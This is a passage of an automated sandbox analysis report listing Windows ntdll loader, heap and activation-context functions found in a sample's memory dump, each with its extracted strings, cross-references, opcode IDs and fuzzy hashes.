                                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 01A68B8F
                                                                                                                              • VerifierDlls, xrefs: 01A68CBD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                              • API String ID: 0-3223716464
                                                                                                                              • Opcode ID: 9fe3c4eebb841ee438953eb3fec94a7ee1d2fceb587d394e4593ccd6e18fda26
                                                                                                                              • Instruction ID: 4a500150ea19c79cf5e6064c808bc20b0bf33754a497a450af6d516795e94025
                                                                                                                              • Opcode Fuzzy Hash: 9fe3c4eebb841ee438953eb3fec94a7ee1d2fceb587d394e4593ccd6e18fda26
                                                                                                                              • Instruction Fuzzy Hash: 44911472A42B12EFD721DF68C990B6B77BCABA4B14F05441CFA466B244C738DC05CBA1
                                                                                                                              Function 019EEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                              • API String ID: 0-1109411897
                                                                                                                              • Opcode ID: cd2c13f0421cb966b81b100be4bd3ebb7b8da466882f609be0196cf7c1e03503
                                                                                                                              • Instruction ID: aa913948ee71f3e861112b51be12079256ed5292b08972df1bccfc55cdc00671
                                                                                                                              • Opcode Fuzzy Hash: cd2c13f0421cb966b81b100be4bd3ebb7b8da466882f609be0196cf7c1e03503
                                                                                                                              • Instruction Fuzzy Hash: 5CA24C74A0562A8FDF65DF18CD88BA9BBB5BF89304F1442EAD50DA7251DB319E81CF00
                                                                                                                              Function 01A163FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-792281065
                                                                                                                              • Opcode ID: 92257a3334aa6f6b7b64f9a68e1482a114d0c7a4078f9320c19ae47969bdf910
                                                                                                                              • Instruction ID: fbb561acad7e0c04580e4aa7700920de2b8a14b9356e07820a8e2f4c0e7c70ad
                                                                                                                              • Opcode Fuzzy Hash: 92257a3334aa6f6b7b64f9a68e1482a114d0c7a4078f9320c19ae47969bdf910
                                                                                                                              • Instruction Fuzzy Hash: D1919E70F45B219BEB35DF18DA44BAE7BB1BF44B24F04001CED09AB285E7B49842C791
                                                                                                                              Function 019D645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A39A2A
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A39A11, 01A39A3A
                                                                                                                              • apphelp.dll, xrefs: 019D6496
                                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A39A01
                                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A399ED
                                                                                                                              • LdrpInitShimEngine, xrefs: 01A399F4, 01A39A07, 01A39A30
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-204845295
                                                                                                                              • Opcode ID: ac69e601b05cc81d1d97101b2ee45f3cb9a3dd35c9eeb1c38f454fd896e74ed1
                                                                                                                              • Instruction ID: f2228455e43fcc2eed35c4cb335780d23467c01e3ac83c3ad95e12d098b42005
                                                                                                                              • Opcode Fuzzy Hash: ac69e601b05cc81d1d97101b2ee45f3cb9a3dd35c9eeb1c38f454fd896e74ed1
                                                                                                                              • Instruction Fuzzy Hash: 0551B0716087059FE720DF28D881BAB77E8FBC4B48F40491DF58A97190D670E946CB93
                                                                                                                              Function 01A1C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • LdrpInitializeProcess, xrefs: 01A1C6C4
                                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 01A581E5
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A1C6C3
                                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01A58170
                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01A58181, 01A581F5
                                                                                                                              • LdrpInitializeImportRedirection, xrefs: 01A58177, 01A581EB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                              • API String ID: 0-475462383
                                                                                                                              • Opcode ID: eedcf814b70afb00abd29530cd4785e167cbdac3390446f26cbb659f3bdd987b
                                                                                                                              • Instruction ID: e47b2ac19dc9cfccf45242b0bc1368970d0d13c7c7cf1ae3f299a1fb69eb6f65
                                                                                                                              • Opcode Fuzzy Hash: eedcf814b70afb00abd29530cd4785e167cbdac3390446f26cbb659f3bdd987b
                                                                                                                              • Instruction Fuzzy Hash: 6B31F5716487469BC324EF29DA45E2A77A4FFD4B20F04091CF9856B295E630ED05C7A2
                                                                                                                              Function 01A12674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01A52160, 01A5219A, 01A521BA
                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01A52178
                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01A52165
                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01A52180
                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01A521BF
                                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01A5219F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                              • API String ID: 0-861424205
                                                                                                                              • Opcode ID: e1fca1835659294312a602a7e93f3fda59838a4942e5d8df27b1ae32731daece
                                                                                                                              • Instruction ID: 1c0ea0c1bc0cf1ec5350b619c55840b7420858f08b9a55c38cbcc84029787263
                                                                                                                              • Opcode Fuzzy Hash: e1fca1835659294312a602a7e93f3fda59838a4942e5d8df27b1ae32731daece
                                                                                                                              • Instruction Fuzzy Hash: DE31E936B40315BBE7259ADA9C81F6B7B78EB94E50F19005EFB087B144D270DA00CBA2
                                                                                                                              Function 01A2096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 01A22DF0: LdrInitializeThunk.NTDLL ref: 01A22DFA
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A20BA3
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A20BB6
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A20D60
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A20D74
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1404860816-0
                                                                                                                              • Opcode ID: 00a5918febedd15e664ff63720fc0686aec9e4443951062978a3fb370a944b1d
                                                                                                                              • Instruction ID: d03b597e291d750fcfef4bd4b168861dd05499f8cae41e27290fd1e590eb2535
                                                                                                                              • Opcode Fuzzy Hash: 00a5918febedd15e664ff63720fc0686aec9e4443951062978a3fb370a944b1d
                                                                                                                              • Instruction Fuzzy Hash: 3E426B71900715DFDB61CF28C980BAAB7F5FF04314F1445AAE999EB241E770AA85CF60
                                                                                                                              Function 019EA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                              • API String ID: 0-379654539
                                                                                                                              • Opcode ID: c897b17997e2ba525e20b22ef8df723d7b72889a40fb24b0ed007cf753226268
                                                                                                                              • Instruction ID: 4650b3ae73c28947ae2d34890a1e45b548e9814b06945c76578b75dd5a134654
                                                                                                                              • Opcode Fuzzy Hash: c897b17997e2ba525e20b22ef8df723d7b72889a40fb24b0ed007cf753226268
                                                                                                                              • Instruction Fuzzy Hash: 85C19D75108382CFD712CF58C548B6AB7E4FF84704F048D6AF9998B2A1E734CA49CB56
                                                                                                                              Function 01A18402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • LdrpInitializeProcess, xrefs: 01A18422
                                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01A1855E
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A18421
                                                                                                                              • @, xrefs: 01A18591
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-1918872054
                                                                                                                              • Opcode ID: 37a6268caa98a1837d0a122a529b093b9c93346538b457e39bc5d9af12983c29
                                                                                                                              • Instruction ID: 3d113d85d2ea5c614762cf02c2131f771f950b65fbecb83fd8fafc2541a21e9d
                                                                                                                              • Opcode Fuzzy Hash: 37a6268caa98a1837d0a122a529b093b9c93346538b457e39bc5d9af12983c29
                                                                                                                              • Instruction Fuzzy Hash: 1B919D71548345AFD721EF25CD80FABBAE8FF84794F44092EFA8892155E738D904CB62
                                                                                                                              Function 01A1273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01A522B6
                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01A521DE
                                                                                                                              • .Local, xrefs: 01A128D8
                                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01A521D9, 01A522B1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                              • API String ID: 0-1239276146
                                                                                                                              • Opcode ID: 74d0f32a7266f1808877942744bc1357f76ae49a82a1eb45083ac6983071b8f1
                                                                                                                              • Instruction ID: ce8955312f89e69f6fc27bfe56c537cbf17b44c8489815e4bcf6ef72dfb6c4e1
                                                                                                                              • Opcode Fuzzy Hash: 74d0f32a7266f1808877942744bc1357f76ae49a82a1eb45083ac6983071b8f1
                                                                                                                              • Instruction Fuzzy Hash: 74A1AC35A0022ADFDB25CF68D884BA9B7B1BF58354F2541EAD948EB255D730DE80CF90
                                                                                                                              Function 01A14AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • RtlDeactivateActivationContext, xrefs: 01A53425, 01A53432, 01A53451
                                                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01A53456
                                                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01A5342A
                                                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01A53437
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                              • API String ID: 0-1245972979
                                                                                                                              • Opcode ID: 74b3d7f1ec39988442af5f76b8ec5858d4a11ed83f19191c68a2b0c8e71a4ffc
                                                                                                                              • Instruction ID: aabee70389bd430fdcab683f04b980e6dbb72ff323631c6c563b9485a265aeae
                                                                                                                              • Opcode Fuzzy Hash: 74b3d7f1ec39988442af5f76b8ec5858d4a11ed83f19191c68a2b0c8e71a4ffc
                                                                                                                              • Instruction Fuzzy Hash: 116112366087129BDB22CF1DC841B2ABBF5BFC4B91F19852DE9999B245C734E801CB91
                                                                                                                              Function 019E64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01A41028
                                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01A40FE5
                                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01A410AE
                                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01A4106B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                              • API String ID: 0-1468400865
                                                                                                                              • Opcode ID: 54a6ed479953c500e0360c1d38fa560e790276d3609f067df9b28c217ce5f122
                                                                                                                              • Instruction ID: c052aa127dc51381513a9214c7a2f23b69e825dc5db2feaf8f7bd6d78b64c97a
                                                                                                                              • Opcode Fuzzy Hash: 54a6ed479953c500e0360c1d38fa560e790276d3609f067df9b28c217ce5f122
                                                                                                                              • Instruction Fuzzy Hash: BA71C1B1A043159FCB21DF18C988F9B7FE8AFA4764F400868F9498B146D734D588CBD2
                                                                                                                              Function 01A0245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01A4A992
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A4A9A2
                                                                                                                              • apphelp.dll, xrefs: 01A02462
                                                                                                                              • LdrpDynamicShimModule, xrefs: 01A4A998
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-176724104
                                                                                                                              • Opcode ID: 57e05854db4adecc81e9d691009d08bdeaf402b0ed66f48ab536e32f33bdbb7e
                                                                                                                              • Instruction ID: 3dc956b662187021fb2d9e48cb0f5b25ae073bb8f5d709908db317c54e7ee35a
                                                                                                                              • Opcode Fuzzy Hash: 57e05854db4adecc81e9d691009d08bdeaf402b0ed66f48ab536e32f33bdbb7e
                                                                                                                              • Instruction Fuzzy Hash: E3314AB9A80701EBDB32DF5DD945A6E77B4FFC4B00F16001AE907A7246C7705942C781
                                                                                                                              Function 019F29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • HEAP[%wZ]: , xrefs: 019F3255
                                                                                                                              • HEAP: , xrefs: 019F3264
                                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 019F327D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                              • API String ID: 0-617086771
                                                                                                                              • Opcode ID: 3d8f6e476cf83b7c9ac7c2f9fb9ccd82780915c7a4e85f9b44fb40571dcccacf
                                                                                                                              • Instruction ID: 9f662f61e6c25079d45341637a8957764fe412e8ab9014ab0d6415dcbf0e17f1
                                                                                                                              • Opcode Fuzzy Hash: 3d8f6e476cf83b7c9ac7c2f9fb9ccd82780915c7a4e85f9b44fb40571dcccacf
                                                                                                                              • Instruction Fuzzy Hash: 8292CE70A04249AFDB25CF68C444BAEBBF5FF48310F18849DEA59AB391D738A945CF50
                                                                                                                              Function 019F0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-4253913091
                                                                                                                              • Opcode ID: c55c94c204d7422f4e4d64c7ba4efd93074b837e1fd2322b2485bff6f4d7d0ab
                                                                                                                              • Instruction ID: 1928a8ed3d2b00cf27a636c5f75ee7644d721dfff113a0ea29da8ec362cf869c
                                                                                                                              • Opcode Fuzzy Hash: c55c94c204d7422f4e4d64c7ba4efd93074b837e1fd2322b2485bff6f4d7d0ab
                                                                                                                              • Instruction Fuzzy Hash: 60F19F34A00606EFEB15CF68C984F6AB7BAFF84304F18455DE61A9B352D734E981CB91
                                                                                                                              Function 01A06962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: $@
                                                                                                                              • API String ID: 2994545307-1077428164
                                                                                                                              • Opcode ID: 792a0bc31be6864369b519131859fffdd342f1bff38c05ba3f3ce8584f7ac5e9
                                                                                                                              • Instruction ID: e3fe7782ef686e3b6619c1b0711203864cf0e042bd6e3e744597b68a2e619b09
                                                                                                                              • Opcode Fuzzy Hash: 792a0bc31be6864369b519131859fffdd342f1bff38c05ba3f3ce8584f7ac5e9
                                                                                                                              • Instruction Fuzzy Hash: 06C27071A093419FE726CF68D840BABBBE5AFC8754F04892DE9C9C7281D734E845CB52
                                                                                                                              Function 019DA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                              • API String ID: 0-2779062949
                                                                                                                              • Opcode ID: 9f1a430bb386716f26ff7652420e610e60fb8377574ba4637c02cc86cd747bb9
                                                                                                                              • Instruction ID: a85c4d2b021b75bb3faf854defdcd49b176d00d661b4f8519a505343da340536
                                                                                                                              • Opcode Fuzzy Hash: 9f1a430bb386716f26ff7652420e610e60fb8377574ba4637c02cc86cd747bb9
                                                                                                                              • Instruction Fuzzy Hash: B9A18C759112299BDB31DF68CC88BEAB7B8EF84710F1041EAEA0DA7251D7359E84CF50
                                                                                                                              Function 01A00BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 01A4A10F
                                                                                                                              • LdrpCheckModule, xrefs: 01A4A117
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A4A121
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-161242083
                                                                                                                              • Opcode ID: a030d060e53bf86eed5e1dd3788968542520af5a6adf321b7e3c5af85ff6db0e
                                                                                                                              • Instruction ID: 2a622ce6c386acda95e8ba02ffd1a68de9e9911b45e69b5082f916b298e23065
                                                                                                                              • Opcode Fuzzy Hash: a030d060e53bf86eed5e1dd3788968542520af5a6adf321b7e3c5af85ff6db0e
                                                                                                                              • Instruction Fuzzy Hash: 5671C074A006059FDB26DF6CDA81BBEB7F4FB88744F18402DE50AE7251E734A942CB50
                                                                                                                              Function 019F0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-1334570610
                                                                                                                              • Opcode ID: 424a0df9c0e9732f428287da04d008897d4b7eb7f290b7dd891783904250ab81
                                                                                                                              • Instruction ID: 499b961fa3c8aaa2db5c502d7beabb93294443063fd9c06853b599b1dd886627
                                                                                                                              • Opcode Fuzzy Hash: 424a0df9c0e9732f428287da04d008897d4b7eb7f290b7dd891783904250ab81
                                                                                                                              • Instruction Fuzzy Hash: AD61E170A00305EFDB29CF28C544B6ABBEAFF85305F18855DE5598F286C770E841CB90
                                                                                                                              Function 01A1C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A582E8
                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 01A582D7
                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 01A582DE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-1783798831
                                                                                                                              • Opcode ID: d5b970cf7aa751cf610f734eb0b0a651e4feeded188a253d67d318fa0c92046c
                                                                                                                              • Instruction ID: c42ba43b54e29dedb25848cbb5e20003f9fc7fface5faa9f48428b532ed3e51f
                                                                                                                              • Opcode Fuzzy Hash: d5b970cf7aa751cf610f734eb0b0a651e4feeded188a253d67d318fa0c92046c
